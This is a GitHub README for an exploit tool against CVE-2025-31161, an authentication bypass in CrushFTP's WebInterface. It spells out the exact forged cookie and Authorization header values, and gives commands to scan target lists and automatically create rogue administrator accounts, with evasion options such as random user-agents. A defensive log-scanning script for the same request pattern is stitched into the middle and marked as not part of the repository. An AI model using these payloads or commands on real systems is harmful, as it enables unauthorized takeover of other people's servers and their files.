# CVE-2025-31161 Exploit 

Exploitation of the CVE-2025-31161 vulnerability in the CrushFTP WebInterface.

## About CVE-2025-31161

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP's WebInterface component. This security flaw allows unauthenticated attackers to execute administrative functions by manipulating specific cookie and authorization header values.

### Vulnerability Details

- **Affected Software**: CrushFTP WebInterface
- **Vulnerability Type**: Authentication Bypass
- **Severity**: Critical (CVSS Score: 9.8)
- **Attack Vector**: Network
- **Impact**: Complete system compromise

The vulnerability exists in the authentication mechanism of CrushFTP's WebInterface, where the application fails to properly validate authentication tokens. By sending specially crafted HTTP requests with specific cookie values (`currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If`) and authorization headers (`AWS4-HMAC-SHA256 Credential=crushadmin/`), attackers can bypass authentication controls and execute administrative functions.

This exploit specifically targets the user management functionality, allowing attackers to create new administrator accounts with full system access. Once exploited, attackers can gain persistent access to the CrushFTP server and potentially access sensitive files, modify server configurations, and compromise the entire system.
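
A defender-side check for the request pattern described above, added here as an example (it is not part of this repository's code). It assumes a reverse proxy that logs the `Authorization` and `Cookie` headers as JSON lines, that the interface is served under `/WebInterface/`, and that ordinary browser sessions do not send an S3-style `Authorization` header there; the log field names and sample records are constructed.

```python
import json
import re

# Authorization scheme and Credential prefix quoted in the section above.
SIGV4_CRED = re.compile(r"^AWS4-HMAC-SHA256\s+Credential=([^/,\s]+)/")

# Constructed sample records. Assumed format: one JSON object per request from
# a reverse proxy configured to log the Authorization and Cookie headers.
SAMPLE_LOG = """\
{"ts":"2025-04-08T11:09:44Z","src":"198.51.100.7","path":"/WebInterface/","authorization":"AWS4-HMAC-SHA256 Credential=crushadmin/","cookie":"currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If"}
{"ts":"2025-04-08T11:10:02Z","src":"203.0.113.20","path":"/WebInterface/","authorization":"","cookie":"currentAuth=Zk9Q; CrushAuth=1744110601000_abcdefghijklmnopqrstuvwxyzZk9Q"}
{"ts":"2025-04-08T11:10:30Z","src":"203.0.113.21","path":"/WebInterface/login.html","authorization":"","cookie":""}
"""

def parse_cookies(header):
    """Split a Cookie header into a name -> value dict."""
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {name: value for name, value in pairs}

def assess(record):
    """Return (claimed_user, reasons) if the request fits the pattern, else None."""
    match = SIGV4_CRED.match(record.get("authorization", ""))
    if not match:
        return None
    reasons = ["S3-style Authorization header on a WebInterface request"]
    if "Signature=" not in record["authorization"]:
        reasons.append("header names a credential but carries no Signature")
    cookies = parse_cookies(record.get("cookie", ""))
    if "CrushAuth" in cookies:
        reasons.append("client also supplied its own CrushAuth session cookie")
    return match.group(1), reasons

def scan(log_text):
    """Return one finding dict per suspicious record in a JSON-lines log."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        if not record.get("path", "").startswith("/WebInterface/"):
            continue
        result = assess(record)
        if result:
            findings.append({"ts": record["ts"], "src": record["src"], "user": result[0], "reasons": result[1]})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["src"], f["user"], "; ".join(f["reasons"]))
```

A finding that names a built-in administrative user such as `crushadmin` is a cue to review the server's user list for accounts created around the same timestamp.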

## Installation

```bash
# Clone the repository
git clone https://github.com/ibrahimsql/CVE-2025-31161.git
cd CVE-2025-31161

# Install dependencies
pip install -r requirements.txt
```

## Usage

### Basic Usage

```bash
# Check a single target for vulnerability
python cve_2025_31161.py --target example.com --check

# Exploit a vulnerable target
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd

# Scan multiple targets from a file
python cve_2025_31161.py --file targets.txt --check --threads 20

# Scan and automatically exploit vulnerable targets
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
```

### Advanced Options

```bash
# Use a proxy
python cve_2025_31161.py --target example.com --check --proxy http://127.0.0.1:8080

# Export results to JSON format
python cve_2025_31161.py --file targets.txt --check --output results.json --format json

# Use custom headers
python cve_2025_31161.py --target example.com --check --custom-headers '{"X-Custom-Header": "Value"}'

# Deep vulnerability checking
python cve_2025_31161.py --target example.com --check --deep-check
```

Example usage:

![Screenshot](https://github.com/user-attachments/assets/c278226c-a5f8-452a-a1e8-96062b226dd7)


## Command Line Arguments

### Target Specification
- `--target`: Single target host to scan/exploit
- `--file`: File containing list of targets (one per line)
- `--port`: Target port (default: 443)

### Actions
- `--check`: Check targets for vulnerability
- `--exploit`: Exploit vulnerable targets
- `--auto-exploit`: Automatically exploit targets found to be vulnerable during check

### Exploitation Options
- `--target-user`: Target user for exploitation (default: crushadmin)
- `--new-user`: Username for the new admin account to create
- `--password`: Password for the new admin account
- `--verify-exploit`: Verify successful exploitation

### Scan Options
- `--threads`: Number of concurrent threads (default: 10)
- `--timeout`: Connection timeout in seconds (default: 10)
- `--deep-check`: Perform deeper vulnerability checks
- `--only-vulnerable`: Only exploit targets that were found vulnerable

### Output Options
- `--output`: Output file for results
- `--format`: Output format (txt, json, csv)
- `--verbose`: Enable verbose output
- `--quiet`: Suppress all output except errors
- `--log-file`: Log file to write to
- `--log-level`: Log level (debug, info, warning, error, critical)

### Advanced Options
- `--proxy`: Proxy to use for requests (e.g., http://127.0.0.1:8080)
- `--user-agent`: Custom User-Agent string
- `--random-agent`: Use a random User-Agent for each request
- `--delay`: Delay between requests in seconds
- `--custom-headers`: Custom headers as JSON string

## Disclaimer

This tool is for educational purposes and authorized security testing only. Unauthorized use against systems you don't own or have permission to test is illegal.

## License

This project is licensed under the MIT License - see the LICENSE file for details.